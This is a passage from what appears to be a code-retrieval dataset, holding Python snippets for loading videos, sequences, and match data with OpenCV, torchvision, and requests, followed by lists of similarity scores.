self.pyvideo_pk = None\n self.save()\n return None", "def loadSeq(self):\n fileName = QtGui.QFileDialog.getOpenFileName( self, self.tr('Open Sequence'), '', \n self.tr('Sequence possibly with SSE predictions (*.seq)') )\n fileName = str(fileName)\n if fileName:\n self.structPred = StructurePrediction.load(fileName, self.app)\n return True\n else : \n return False", "def load(self, fileName=None, cacheString=None, callback=None):\n if fileName != None:\n self.videoPath = fileName\n if cacheString != None:\n self.cacheString = cacheString\n \n if not os.path.exists(self.videoPath):\n raise ValueError(\"ERROR : %s don't exist\" % (self.videoPath))\n \n if callback != None:\n callback(0.1, \"Load the video with OpenCV\")\n \n self.video = 
cv2.VideoCapture(self.videoPath)\n \n if(not self.video.isOpened()):\n self.video = None\n raise ValueError(\"ERROR : Can't load %s\" % (self.videoPath))\n \n self.fps = int(self.video.get(cv2.CAP_PROP_FPS))\n self.frameCount = self.realFrameNumber(callback)\n \n if callback != None:\n callback(0.85, \"Load or create the cache file\")\n \n # we load the cache\n self.cachePath = self.videoPath + self.cacheString + \".json\"\n self.loadCacheFile() #we load or create the cache file\n \n # we draw the first frame\n self.setFrame(0)", "def test_probe_video_from_file(self, test_video, config):\n full_path = os.path.join(VIDEO_DIR, test_video)\n probe_result = torch.ops.video_reader.probe_video_from_file(full_path)\n self.check_probe_result(probe_result, config)", "def load_velo(self):\n # Find all the Velodyne files\n velo_path = os.path.join(self.sequence_path, 'velodyne', '*.bin')\n velo_files = sorted(glob.glob(velo_path))\n\n # Subselect the chosen range of frames, if any\n if self.frame_range:\n velo_files = [velo_files[i] for i in self.frame_range]\n\n print('Found ' + str(len(velo_files)) + ' Velodyne scans...')\n\n # Read the Velodyne scans. Each point is [x,y,z,reflectance]\n self.velo = utils.load_velo_scans(velo_files)\n\n print('done.')", "def video_config():\n\tcap = cv2.VideoCapture(0)\n\twhile not cap.isOpened():\n\t cap = cv2.VideoCapture(0)\n\t cv2.waitKey(10)\n\t print \"Wait for the header\"\n\tpos_frame = cap.get(cv2.cv.CV_CAP_PROP_POS_FRAMES)\n\t\n\treturn cap, pos_frame", "def _load(self):\n if not self._loaded:\n url = f\"https://api.opendota.com/api/matches/{self.id}\"\n logger.info(\"Loading match details for match id: %s from url %s\",\n self._id, url)\n self.data = requests.get(url).json()\n self._duration = self.data.get('duration')\n self._chat = self.data.get('chat')\n self._cluster = self.data.get('cluster')\n self._engine = self.data.get('engine')\n self._first_blood_time = self.data.get('first_blood_time')\n self._game_mode = self.data.get('game_mode')\n self._human_players = self.data.get('human_players')\n self._league_id = self.data.get('league_id')\n self._lobby_type = self.data.get('lobby_type')\n self._match_seq_num = self.data.get('match_seq_num')\n self._negative_votes = self.data.get('negative_votes')\n self._positive_votes = self.data.get('positive_votes')\n self._objectives = self.data.get('objectives')\n self._picks_bans = self.data.get('picks_bans')\n self._barracks_status_dire = self.data.get('barracks_status_dire')\n self._dire_score = self.data.get('dire_score')\n self._dire_team = self.data.get('dire_team')\n self._tower_status_dire = self.data.get('tower_status_dire')\n self._barracks_status_radiant = self.data.get('barracks_status_radiant')\n self._radiant_gold_adv = self.data.get('radiant_gold_adv')\n self._radiant_xp_adv = self.data.get('radiant_xp_adv')\n self._radiant_score = self.data.get('radiant_score')\n self._radiant_team = self.data.get('radiant_team')\n self._radiant_win = self.data.get('radiant_win')\n self._tower_status_radiant = self.data.get('tower_status_radiant')\n self._start_time = self.data.get('start_time')\n self._teamfights = self.data.get('teamfights')\n self._version = self.data.get('version')\n self._replay_salt = self.data.get('replay_salt')\n self._series_id = self.data.get('series_id')\n self._series_type = self.data.get('series_type')\n self._league = self.data.get('league')\n self._skill = self.data.get('skill')\n self._players = self.data.get('players')\n self._patch = self.data.get('patch')\n self._region = 
self.data.get('region')\n self._all_word_counts = self.data.get('all_word_counts')\n self._version = self.data.get('version')\n self._throw = self.data.get('throw')\n self._comeback = self.data.get('comeback')\n self._cosmetics = self.data.get('cosmetics')\n self._draft_timings = self.data.get('draft_timings')\n self._loss = self.data.get('loss')\n self._win = self.data.get('win')\n self._replay_url = self.data.get('replay_url')\n self._loaded = True", "def get_video_data():\n\n vid_data = []\n with open('USvideos.csv', newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in spamreader:\n if len(row) == 16:\n vid_dict = {'video_id': row[0],\n 'trending_date': row[1],\n 'title': row[2],\n 'channel_title': row[3],\n 'category_id': row[4],\n 'publish_times': row[5],\n 'tags': row[6],\n 'views': row[7],\n 'likes': row[8],\n 'dislikes': row[9],\n 'comment_count': row[10],\n 'thumbnail_link': row[11],\n 'comments_disabled': row[12],\n 'ratings_disabled': row[13],\n 'video_error': row[14],\n 'description': row[15]\n }\n vid_data.append(vid_dict)\n return vid_data", "def load_stream(filename, folder):\n cap = cv2.VideoCapture(os.path.join(folder, filename))\n while True:\n ret, frame = cap.read()\n cv2.imshow(\"img\", frame)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n cap.release()\n cv2.destroyAllWindows()\n break", "def update(self):\n self.frame = self.video_stream.read()", "def get_pimax_data_object(evt, src):\n o = evt.get(_psana.Pimax.FrameV1, src)\n if o is not None: return o\n\n return None", "def read(self, ifDrawAxis=None, ifDrawSquare=None):\n if(self.isLoaded() == False):\n return\n self.ret, frame = self.video.read()\n if (self.ret == True):\n \n # Draw frame\n self.currentFrame = frame\n self.currentFrameNumber = int(self.video.get(cv2.CAP_PROP_POS_FRAMES))\n \n else: # If the video is end\n self.isPlaying = False\n \n return self.frame(ifDrawAxis, ifDrawSquare)", "def load(self):\n canSave = self.canSave\n #--Header\n inPath = os.path.join(self.fileInfo.dir,self.fileInfo.name)\n ins = Tes3Reader(self.fileInfo.name,file(inPath,'rb'))\n (name,size,delFlag,recFlag) = ins.unpack('4s3i',16,'REC_HEAD')\n self.tes3 = Tes3(name,size,delFlag,recFlag,ins,True)\n #--Raw data read\n while not ins.atEnd():\n #--Get record info and handle it\n (name,size,delFlag,recFlag) = ins.unpackRecHeader()\n #--LEVC?\n if name == 'LEVC':\n levc = Levc(name,size,delFlag,recFlag,ins,True)\n self.levcs[levc.id] = levc\n if canSave: self.records.append(levc)\n #print ' Added:',levc.id\n elif name == 'LEVI':\n levi = Levi(name,size,delFlag,recFlag,ins,True)\n self.levis[levi.id] = levi\n if canSave: self.records.append(levi)\n #print ' Added:',levi.id\n #--Other\n elif canSave:\n record = Record(name,size,delFlag,recFlag,ins)\n self.records.append(record)\n else:\n ins.seek(size,1,'Record')\n #--Done Reading\n ins.close()", "def read_poses_for_camera(record_path, camera_name):\n\n # Resolve pose.txt file path for camera\n poses_path = os.path.join(record_path, camera_name, 'pose.txt')\n if os.path.exists(poses_path):\n poses = read_poses_dict(poses_path)\n else:\n # Sample type dataset (aka zpark-sample)\n poses_path = os.path.join(record_path, camera_name + '.txt')\n poses = read_poses_dict_6(poses_path)\n return poses", "def test_read_video_from_memory_get_pts_only(self, test_video, config):\n # video related\n width, height, min_dimension, max_dimension = 0, 0, 0, 0\n video_start_pts, video_end_pts = 0, -1\n video_timebase_num, video_timebase_den = 0, 1\n # audio 
related\n samples, channels = 0, 0\n audio_start_pts, audio_end_pts = 0, -1\n audio_timebase_num, audio_timebase_den = 0, 1\n\n _, video_tensor = _get_video_tensor(VIDEO_DIR, test_video)\n\n # pass 1: decode all frames using cpp decoder\n tv_result = torch.ops.video_reader.read_video_from_memory(\n video_tensor,\n SEEK_FRAME_MARGIN,\n 0, # getPtsOnly\n 1, # readVideoStream\n width,\n height,\n min_dimension,\n max_dimension,\n video_start_pts,\n video_end_pts,\n video_timebase_num,\n video_timebase_den,\n 1, # readAudioStream\n samples,\n channels,\n audio_start_pts,\n audio_end_pts,\n audio_timebase_num,\n audio_timebase_den,\n )\n assert abs(config.video_fps - tv_result[3].item()) < 0.01\n\n # pass 2: decode all frames to get PTS only using cpp decoder\n tv_result_pts_only = torch.ops.video_reader.read_video_from_memory(\n video_tensor,\n SEEK_FRAME_MARGIN,\n 1, # getPtsOnly\n 1, # readVideoStream\n width,\n height,\n min_dimension,\n max_dimension,\n video_start_pts,\n video_end_pts,\n video_timebase_num,\n video_timebase_den,\n 1, # readAudioStream\n samples,\n channels,\n audio_start_pts,\n audio_end_pts,\n audio_timebase_num,\n audio_timebase_den,\n )\n\n assert not tv_result_pts_only[0].numel()\n assert not tv_result_pts_only[5].numel()\n self.compare_decoding_result(tv_result, tv_result_pts_only)", "def fetch(self, movie_id: str) -> AVInfo:\n raise NotImplementedError()", "def expected_data(self):\n yaml_file = None\n for yaml_ext in YAML_EXTENSIONS:\n yaml_file = self.video_path + yaml_ext\n if os.path.isfile(yaml_file):\n break\n\n if not yaml_file or not os.path.isfile(yaml_file):\n raise IOError('Unable to find expected file for {!r}', self.video_path)\n\n return read_yaml(yaml_file)", "def load(self):\n self.data = NSPSpecIO().read(self.path)", "def from_platform(self):\n project_name = self.platform_params['project_name']\n project_id = self.platform_params['project_id']\n dataset_name = self.platform_params['dataset_name']\n dataset_id = self.platform_params['dataset_id']\n item_filepath = self.platform_params['item_filepath']\n item_id = self.platform_params['item_id']\n\n # load remote item\n if dataset_id is None:\n self.project = dl.projects.get(project_name=project_name, project_id=project_id)\n if self.project is None:\n raise ValueError('Project doesnt exists. name: %s, id: %s' % (project_name, project_id))\n self.dataset = self.project.datasets.get(dataset_name=dataset_name, dataset_id=dataset_id)\n else:\n self.dataset = dl.datasets.get(dataset_id=dataset_id)\n if self.dataset is None:\n raise ValueError('Dataset doesnt exists. name: %s, id: %s' % (dataset_name, dataset_id))\n self.item = self.dataset.items.get(filepath=item_filepath, item_id=item_id)\n if self.item is None:\n raise ValueError('Item doesnt exists. 
name: %s, id: %s' % (item_filepath, item_id))\n self.labels = {label.tag: label.rgb for label in self.dataset.labels}\n _, ext = os.path.splitext(self.item.filename[1:])\n video_filename = os.path.join(self.dataset.__get_local_path__(), self.item.filename[1:])\n if not os.path.isdir(os.path.dirname(video_filename)):\n os.makedirs(os.path.dirname(video_filename))\n if not os.path.isfile(video_filename):\n self.item.download(local_path=os.path.dirname(video_filename), to_items_folder=False)\n self.video_source = video_filename\n self.video_annotations = self.item.annotations.list()", "def load(self, p):\n return", "def get_vimba_data_object(evt, src):\n o = evt.get(_psana.Vimba.FrameV1, src)\n if o is not None: return o\n\n return None", "def video_single(request, vid):\n mongodb = get_db() \n [data, peaks] = video_single_query(vid)\n videos = video_info_query()\n # from edinsights.core.render import render\n return render(request, \"single-view.html\", {\n 'video_id': vid, 'data': data, 'videos': videos, 'peaks': peaks\n })", "def video_thread():\n global last_frame\n # Creating stream capture object\n cap = cv2.VideoCapture('udp://' + drone.tello_ip + ':11111')\n\n while(True):\n _, last_frame = cap.read()\n cap.release()", "def load(self, _fName, _testOnly=False): \n tempDir = os.path.dirname(_fName)\n if len(tempDir) > 0:\n tempDir += \"\\\\\"\n self.fNameVideo = _fName\n self.fExtVideo = os.path.splitext(_fName)[1].lower()\n self.isTestOnly = _testOnly\n \n if self.fExtVideo in glo.QDSpy_vidAllowedVideoExts:\n return self.__loadVideo()\n else:\n return stm.StimErrC.invalidVideoFormat", "def expected_data(self):\n yaml_file = None\n yaml_folder = os.path.normpath(os.path.join(os.path.split(self.video_path)[0], os.pardir))\n for yaml_ext in YAML_EXTENSIONS:\n yaml_file = os.path.join(yaml_folder, self.provider_name, os.path.basename(self.video_path) + yaml_ext)\n if os.path.isfile(yaml_file):\n break\n\n if not yaml_file or not os.path.isfile(yaml_file):\n raise IOError('Unable to find expected file for {!r}', self.video_path)\n\n return read_yaml(yaml_file)", "def _video_test_loader_from_config(cfg, dataset_name, mapper=None):\n dataset = get_video_detection_dataset_dicts(\n [dataset_name],\n filter_empty=False,\n proposal_files=[\n cfg.DATASETS.PROPOSAL_FILES_TEST[list(cfg.DATASETS.TEST).index(dataset_name)]\n ]\n if cfg.MODEL.LOAD_PROPOSALS\n else None,\n )\n if mapper is None:\n mapper = VideoDatasetMapper(cfg, False)\n return {\n \"dataset\": dataset,\n \"mapper\": mapper,\n \"num_workers\": cfg.DATALOADER.NUM_WORKERS,\n \"first_frame_indices\": MetadataCatalog.get(dataset_name).first_frame_indices,\n # \"sampler_pair_offset\": cfg.DATALOADER.SAMPLER_PAIR_OFFSET_TEST,\n }", "def load_data(self):\n raise NotImplementedError()", "def __init__(self, video: cv2.VideoCapture):\n self.video = video", "def video(ctx, video_file, analytic_addr):\n if not analytic_addr:\n analytic_addr = [\"localhost:50051\"]\n db = ctx.obj.db\n client = aceclient.AnalyticMultiClient()\n classes = {}\n cap = cv2.VideoCapture(video_file)\n window_names = []\n f_req = analytic_pb2.FrameRequest()\n for a in analytic_addr:\n analytic = analytic_pb2.AnalyticData()\n analytic.addr = a\n f_req.analytics.append(analytic)\n # Load all frames into a queue buffer\n buf = Queue()\n while (cap.isOpened()):\n ret, frame = cap.read()\n if not ret:\n break\n buf.put(frame)\n try:\n while not buf.empty():\n frame = buf.get(block=False)\n resp = analytic_pb2.CompositeResults()\n resp = client.process_frame(frame, f_req, 
resp)\n render(resp, window_names, classes, frame, db)\n finally:\n cv2.destroyAllWindows()\n print(\"Shutting down\")", "def isLoaded(self):\n if self.video == None:\n return False\n return True", "def __init__(self, video_source = 0):\n self.vid = cv2.VideoCapture(video_source)\n if not self.vid.isOpened():\n raise ValueError(\"Unable to open video source\", video_source)\n\n\n # Get video source width and height\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)" ]
[ "0.63587195", "0.6327954", "0.6313313", "0.6260543", "0.6144583", "0.60049814", "0.6003176", "0.5981438", "0.58994627", "0.5867908", "0.57829833", "0.5776408", "0.57461214", "0.57129264", "0.5711681", "0.5697466", "0.5672912", "0.55612403", "0.5529223", "0.552714", "0.5512627", "0.55091256", "0.5497744", "0.5479282", "0.5467995", "0.54570466", "0.53785074", "0.535449", "0.5338231", "0.53356856", "0.5322094", "0.53220105", "0.53205836", "0.53159815", "0.5310162", "0.53063256", "0.5304672", "0.53015774", "0.5296137", "0.52913356", "0.52885425", "0.5267676", "0.5265517", "0.52629614", "0.5262406", "0.5262348", "0.52517194", "0.52517194", "0.5237946", "0.52370226", "0.5233081", "0.5230195", "0.52256215", "0.5223842", "0.5214847", "0.520595", "0.5205746", "0.5172461", "0.51701987", "0.5167225", "0.5165457", "0.5161735", "0.5160994", "0.51519144", "0.5148111", "0.51252604", "0.51251197", "0.5124408", "0.5119616", "0.51189375", "0.5118376", "0.5116994", "0.5115963", "0.5109862", "0.51028025", "0.50572854", "0.50387454", "0.5037337", "0.50261354", "0.5020558", "0.50178707", "0.5016372", "0.5013567", "0.50092304", "0.50048864", "0.50042206", "0.49900094", "0.49876142", "0.498732", "0.49799258", "0.4979824", "0.4977684", "0.49767873", "0.49717", "0.49700493", "0.49627575", "0.4936365", "0.49336508", "0.4928939", "0.49268115", "0.4923452" ]
0.0
-1
Print allocation and remaining quota in Sqkm.
def quota(): try: fname = os.path.join(os.path.expanduser("~"), ".planet.json") contents = {} if os.path.exists(fname): with open(fname, "r") as fp: contents = json.loads(fp.read()) else: raise IOError("Escape to End and Initialize") if not len(contents) != 0: raise IOError("Escape to End and Initialize") else: k = contents["key"] main = requests.get( "https://api.planet.com/auth/v1/" + "experimental/public/my/subscriptions", auth=HTTPBasicAuth(k, ""), ) if main.status_code == 200: content = main.json() for item_id in content: print(" ") print("Allocation Name: %s" % item_id["organization"]["name"]) print( "Allocation active from: %s" % item_id["active_from"].split("T")[0] ) print("Quota Enabled: %s" % item_id["quota_enabled"]) print("Total Quota in SqKm: %s" % item_id["quota_sqkm"]) print("Total Quota used: %s" % item_id["quota_used"]) if (item_id["quota_sqkm"]) is not None: leftquota = float( item_id["quota_sqkm"] - float(item_id["quota_used"]) ) print("Remaining Quota in SqKm: %s" % leftquota) else: print("No Quota Allocated") print("") else: print("Failed with exception code: " + str(main.status_code)) except IOError: print("Initialize client or provide API Key")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_usage(self):\r\n print 'Total Usage: %f compute seconds' % self.box_usage\r\n cost = self.box_usage * 0.14\r\n print 'Approximate Cost: $%f' % cost", "def print_usage(self):\n print('Total Usage: %f compute seconds' % self.box_usage)\n cost = self.box_usage * 0.14\n print('Approximate Cost: $%f' % cost)", "def make_output_quota(self, quota):\n self.reset()\n self.run_ten_years_quota(quota)\n return self.show_results()", "def print_output():\n print(\"count: [primary: \"+str(primary_shards)+\", replica: \"+str(secondary_shards)+\"]\")\n print(\"size: [primary: \"+pretty_print_storage(total_size_primary)+\", replica: \"+pretty_print_storage(total_size_secondary)+\"]\")\n print(\"disk-max-node: \"+max_size_node_name)\n print(\"watermark-breached: \"+str(watermark_breached))", "def __str__(self):\n quota = self.id + \" = \" + str(self.usage)\n if self.units != 'integer':\n quota += \"\" + self.units\n return quota", "def print_mem_usage(usage):\n for region in usage.keys():\n used = usage[region][\"used\"]\n free = usage[region][\"free\"]\n usage_msg = \"{region}:\\n used: {used} bytes\\n free: {free} bytes\"\n usage_msg = usage_msg.format(region=region, used=used, free=free)\n print(usage_msg)", "def quota(self) -> 'outputs.CommitmentQuotaResponse':\n return pulumi.get(self, \"quota\")", "def get_quota(self):\n raise NotImplementedError", "def test_list_cluster_resource_quota(self):\n pass", "def print_me(self, tabs=0, tab=' '):\n pre = tab*tabs\n print(pre+'Storage:')\n print(pre+' stores:', self._stores)\n print(pre+' rate:', self._rate)\n print(pre+' capacity:', self._capacity)", "def api_quota_command():\n # 1. There is no parameter input required from Demisto\n # 2. Get the quota status info from SlashNext API\n response = api_quota()\n if response.get('errorNo') != 0:\n return\n # 3. 
Parse and format the response\n quota_data = response.get('quotaDetails')\n\n title = 'SlashNext Phishing Incident Response - API Quota\\n'\\\n '##### Note: {}'.format(quota_data.get('note'))\n\n snx_ioc_cont = {\n 'LicensedQuota': quota_data.get('licensedQuota'),\n 'RemainingQuota': quota_data.get('remainingQuota'),\n 'ExpirationDate': quota_data.get('expiryDate'),\n 'IsExpired': quota_data.get('isExpired')\n }\n\n ec = {\n 'SlashNext.Quota(val.Value === obj.Value)': snx_ioc_cont\n }\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['LicensedQuota',\n 'RemainingQuota',\n 'ExpirationDate']\n )\n\n return_outputs(md, ec, snx_ioc_cont)", "def __repr__(self):\n return \"This {} has {} GB of memory\".format(\n self.name,\n self.memory_in_gb\n )", "def show_supply(self):\n print(self.total_supply)", "def show_board(self):\n print(self.capacity_list)", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def account_space(access_token):\n client = dropbox.client.DropboxClient(access_token)\n account_info = client.account_info()\n quota_info = account_info['quota_info']\n total = quota_info['quota']\n used = quota_info['normal'] + quota_info['shared']\n return total - used", "def show(self, threadID):\n print(\"[thread %d] Simulated Clustered Disk Space Allocation\" % threadID)\n line = '=' * 32\n print line\n for i in range(self.size/32):\n print ''.join(self.disk_mem[32*i:32*(i+1)])\n print line", "def printing():\r\n document.add_heading('Printing Service details', 1)\r\n\r\n printing_metrics = ['customproperties',\r\n 'workingSetSizeHiPct',\r\n 'logVerbosityAuditActivity',\r\n 'logVerbosityService',\r\n 'hostname',\r\n 'tags']\r\n\r\n printnodes = get_qlik_sense.get_printing()\r\n num_of_nodes = len(printnodes)\r\n num_of_print_metrics = len(printing_metrics)\r\n table = document.add_table(rows=num_of_print_metrics+1, cols=num_of_nodes+1)\r\n table.style = 'Grid Table 1 Light Accent 1'\r\n row = table.rows[0]\r\n row.cells[0].text = 'Metric'\r\n for item in range(0, num_of_nodes):\r\n row.cells[item+1].text = printnodes[item][6]\r\n for item in range(num_of_print_metrics):\r\n row = table.rows[item+1]\r\n row.cells[0].text = str(printing_metrics[item])\r\n for printnode in range(num_of_nodes):\r\n row.cells[printnode+1].text = str(printnodes[printnode][item])\r\n\r\n document.add_page_break()", "def ok(self, results):\n return \"{:5.2f}% capacity used\".format(\n results[\"usage\"].resource.usage_ratio * 100.0\n )", "def print_me(self, tabs=0, tab=' '):\n pre = tab*tabs\n print(pre+'Demand/Load:')\n print(pre+' demands:', self._demands)\n print(pre+' penalty:', self._penalty)\n print(pre+' capacity:', self._capacity)", "def _print_progress(self):\n print(\n 'E {} S {} TR {:6.2f} G {:6.2f} Reg {:6.5f} Loss {:6.5f} AvgQ {:6.2f}'\n ' MinR {:6.2f} MaxR {:6.2f}'.format(\n self.episode, self.episode_step, self.tracker.total_reward, self.tracker.discounted_rewards,\n self.reg_loss_val, self.critic_loss_val, self.mean_q_val,\n self.tracker.min_reward, self.tracker.max_reward))", "def _get_capacity_info(self, nfs_share):\n nms = self.share2nms[nfs_share]\n ns_volume, ns_folder = self._get_share_datasets(nfs_share)\n folder_props = nms.folder.get_child_props('%s/%s' % (ns_volume,\n ns_folder),\n 'used|available')\n free = utils.str2size(folder_props['available'])\n allocated = utils.str2size(folder_props['used'])\n self.shares_with_capacities[nfs_share] = {\n 'free': utils.str2gib_size(free),\n 'total': utils.str2gib_size(free + allocated)}\n return free + allocated, free, allocated", 
"def collect_metrics():\n p = os.path.join(os.sep, \"mnt\", \"glusterfs\")\n mount_stats = os.statvfs(p)\n # block size * total blocks\n total_space = mount_stats.f_blocks * mount_stats.f_bsize\n free_space = mount_stats.f_bfree * mount_stats.f_bsize\n # capsize only operates on i64 values\n used_space = total_space - free_space\n gb_used = used_space / 1024 / 1024 / 1024\n\n # log!(format!(\"Collecting metric gb-used {}\", gb_used), Info)\n add_metric(\"gb-used\", \"{}\".format(gb_used))", "def show(self, req, tenant_id, id):\n LOG.info(\"Indexing quota info for tenant '%(id)s'\\n\"\n \"req : '%(req)s'\\n\\n\", {\"id\": id, \"req\": req})\n\n context = req.environ[wsgi.CONTEXT_KEY]\n if id != tenant_id and not context.is_admin:\n raise exception.TroveOperationAuthError(\n tenant_id=tenant_id\n )\n\n usages = quota_engine.get_all_quota_usages_by_tenant(id)\n limits = quota_engine.get_all_quotas_by_tenant(id)\n for key in usages.keys():\n setattr(usages[key], \"limit\", limits[key].hard_limit)\n return wsgi.Result(views.QuotaUsageView(usages).data(), 200)", "def show_quota(self, tenant_id, **_params):\r\n return self.get(self.quota_path % (tenant_id), params=_params)", "def log_free_disk_space():\n cmd = 'df -h'\n p = Popen(cmd, shell=True, stdout=PIPE)\n res = p.communicate()\n if res[0]:\n res = res[0]\n else:\n res = res[1]\n logger.warning('Disk usage statisticks:')\n logger.warning(res)", "def api_quota():\n # Create the required data dictionary for Quota/Status\n api_data = {} # type: Dict[str, str]\n response = http_request(endpoint=API_QUOTA, data=api_data)\n\n if response.get('errorNo') != 0:\n return_error('API Returned, {}:{}'.format(response.get('errorNo'), response.get('errorMsg')))\n\n return response", "def show_queue(Q):\n print(\"(Size of the queue:\", Q.qsize(), \")\", end=\" \")\n for n in list(Q.queue):\n print(n, end=\" \")\n print()", "def print_current_mem_usage():\n mem = get_current_mem_usage()\n output = \"# Mem usage = {} MiB #\".format(mem)\n print(\"\\n\" + \"-\" * len(output))\n print(output)\n print(\"-\" * len(output) + \"\\n\")", "def test_read_cluster_resource_quota_status(self):\n pass", "def print_students_gpa(std):\n print (\"Student Id:\", get_id(std))\n print (\"Student name:\", get_fname(get_name(std)), get_lname(get_name(std)))\n print (\"GPA: %.2f\" %(calc_gpa(std)))", "def _get_share_capacity_info(self):\n lcfg = self.configuration\n share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,\n lcfg.zfssa_nfs_project,\n lcfg.zfssa_nfs_share)\n\n free = share_details['space_available']\n used = share_details['space_total']\n return free, used", "def do_quota_class_get(cs, args):\n utils.print_dict(cs.quota_classes.get(args.quota_class_name)._info)", "def get_space_used():\n fs.get_space_used()", "def get_usage(self):\r\n return self.box_usage", "def _print_progress(self):\n if self.current_training_size % 1000 == 0:\n print(self.current_training_size, end='')\n elif self.current_training_size % 100 == 0:\n print('.', end='')", "def print_allocations(self, ):\n pass", "def main(self, names, options) :\n names = self.sanitizeNames(options, names)\n suffix = (options[\"groups\"] and \"Group\") or \"User\" \n printernames = options[\"printer\"].split(\",\")\n \n if not options[\"list\"] :\n percent = Percent(self)\n percent.display(\"%s...\" % _(\"Extracting datas\"))\n printers = self.storage.getMatchingPrinters(options[\"printer\"])\n entries = getattr(self.storage, \"getMatching%ss\" % suffix)(\",\".join(names))\n if not options[\"list\"] :\n 
percent.setSize(len(printers) * len(entries))\n \n if options[\"list\"] :\n for printer in printers :\n for entry in entries :\n pqentry = getattr(self.storage, \"get%sPQuota\" % suffix)(entry, printer)\n if pqentry.Exists :\n print \"%s@%s\" % (entry.Name, printer.Name)\n print \" %s\" % (_(\"Page counter : %s\") % pqentry.PageCounter)\n print \" %s\" % (_(\"Lifetime page counter : %s\") % pqentry.LifePageCounter)\n print \" %s\" % (_(\"Soft limit : %s\") % pqentry.SoftLimit)\n print \" %s\" % (_(\"Hard limit : %s\") % pqentry.HardLimit)\n print \" %s\" % (_(\"Date limit : %s\") % pqentry.DateLimit)\n print \" %s (Not supported yet)\" % (_(\"Maximum job size : %s\") % ((pqentry.MaxJobSize and (_(\"%s pages\") % pqentry.MaxJobSize)) or _(\"Unlimited\")))\n if hasattr(pqentry, \"WarnCount\") :\n print \" %s\" % (_(\"Warning banners printed : %s\") % pqentry.WarnCount)\n print\n elif options[\"delete\"] : \n percent.display(\"\\n%s...\" % _(\"Deletion\"))\n getattr(self.storage, \"deleteMany%sPQuotas\" % suffix)(printers, entries)\n percent.display(\"\\n\")\n else :\n skipexisting = options[\"skipexisting\"]\n used = options[\"used\"]\n if used :\n used = used.strip()\n try :\n int(used)\n except ValueError :\n raise CPSCommandLineError, _(\"Invalid used value %s.\") % used\n \n increase = options[\"increase\"]\n if increase :\n try :\n increase = int(increase.strip())\n except ValueError :\n raise CPSCommandLineError, _(\"Invalid increase value %s.\") % increase\n \n noquota = options[\"noquota\"]\n reset = options[\"reset\"] \n hardreset = options[\"hardreset\"]\n softlimit = hardlimit = None\n if not noquota :\n if options[\"softlimit\"] :\n try :\n softlimit = int(options[\"softlimit\"].strip())\n if softlimit < 0 :\n raise ValueError\n except ValueError : \n raise CPSCommandLineError, _(\"Invalid softlimit value %s.\") % options[\"softlimit\"]\n if options[\"hardlimit\"] :\n try :\n hardlimit = int(options[\"hardlimit\"].strip())\n if hardlimit < 0 :\n raise ValueError\n except ValueError : \n raise CPSCommandLineError, _(\"Invalid hardlimit value %s.\") % options[\"hardlimit\"]\n if (softlimit is not None) and (hardlimit is not None) and (hardlimit < softlimit) : \n # error, exchange them\n self.printInfo(_(\"Hard limit %i is less than soft limit %i, values will be exchanged.\") % (hardlimit, softlimit))\n (softlimit, hardlimit) = (hardlimit, softlimit)\n if hardlimit is None : \n hardlimit = softlimit\n if hardlimit is not None :\n self.printInfo(_(\"Undefined hard limit set to soft limit (%s).\") % str(hardlimit))\n if softlimit is None : \n softlimit = hardlimit\n if softlimit is not None :\n self.printInfo(_(\"Undefined soft limit set to hard limit (%s).\") % str(softlimit))\n \n self.storage.beginTransaction() \n try :\n if options[\"add\"] :\n percent.display(\"\\n%s...\\n\" % _(\"Creation\"))\n if not entries : \n self.printInfo(_(\"No entry matches %s. 
Please use pkusers to create them first.\") % (\" \".join(names)), \"warn\")\n \n factory = globals()[\"Storage%sPQuota\" % suffix]\n for printer in printers :\n pname = printer.Name\n for entry in entries :\n ename = entry.Name\n pqkey = \"%s@%s\" % (ename, pname)\n pqentry = factory(self.storage, entry, printer)\n self.modifyPQEntry(pqkey, pqentry, noquota, \\\n softlimit, hardlimit, \\\n increase, reset, \\\n hardreset, suffix, used)\n oldpqentry = getattr(self.storage, \"add%sPQuota\" % suffix)(pqentry)\n if oldpqentry is not None : \n if skipexisting :\n self.logdebug(\"%s print quota entry %s@%s already exists, skipping.\" % (suffix, ename, pname))\n else : \n self.logdebug(\"%s print quota entry %s@%s already exists, will be modified.\" % (suffix, ename, pname))\n self.modifyPQEntry(pqkey, oldpqentry, noquota, \\\n softlimit, hardlimit, \\\n increase, reset, \\\n hardreset, suffix, used)\n oldpqentry.save() \n percent.oneMore()\n else : \n percent.display(\"\\n%s...\\n\" % _(\"Modification\"))\n for printer in printers :\n for entry in entries :\n pqkey = \"%s@%s\" % (entry.Name, printer.Name)\n pqentry = getattr(self.storage, \"get%sPQuota\" % suffix)(entry, printer)\n if pqentry.Exists : \n self.modifyPQEntry(pqkey, pqentry, noquota, \\\n softlimit, hardlimit, \\\n increase, reset, \\\n hardreset, suffix, used)\n pqentry.save() \n percent.oneMore()\n except : \n self.storage.rollbackTransaction()\n raise\n else : \n self.storage.commitTransaction()\n \n if not options[\"list\"] :\n percent.done()", "def capacity_gb(self) -> str:\n return pulumi.get(self, \"capacity_gb\")", "def getquota(self, mailbox):\n if \"QUOTA\" not in self.capabilities:\n self.quota_limit = self.quota_current = None\n return\n try:\n data = self._cmd(\"GETQUOTAROOT\", self._encode_mbox_name(mailbox),\n responses=[\"QUOTAROOT\", \"QUOTA\"])\n except ImapError:\n data = None\n finally:\n if data is None:\n self.quota_limit = self.quota_current = None\n return\n\n quotadef = data[1][0].decode()\n m = re.search(r\"\\(STORAGE (\\d+) (\\d+)\\)\", quotadef)\n if not m:\n print(\"Problem while parsing quota def\")\n return\n self.quota_limit = int(m.group(2))\n self.quota_current = int(m.group(1))\n try:\n self.quota_usage = (\n int(float(self.quota_current) / float(self.quota_limit) * 100)\n )\n except TypeError:\n self.quota_usage = -1", "def printSchedule(self):\n\t\tself.printWaiting()\n\t\tprint ' '.join(map(format,range(20),['2' for _ in range(20)]))\n\t\tprint \"\"", "def get_report_as_text(self, **kwargs) -> str:\n\n storage_requirement, used_yard_capacity_over_time = 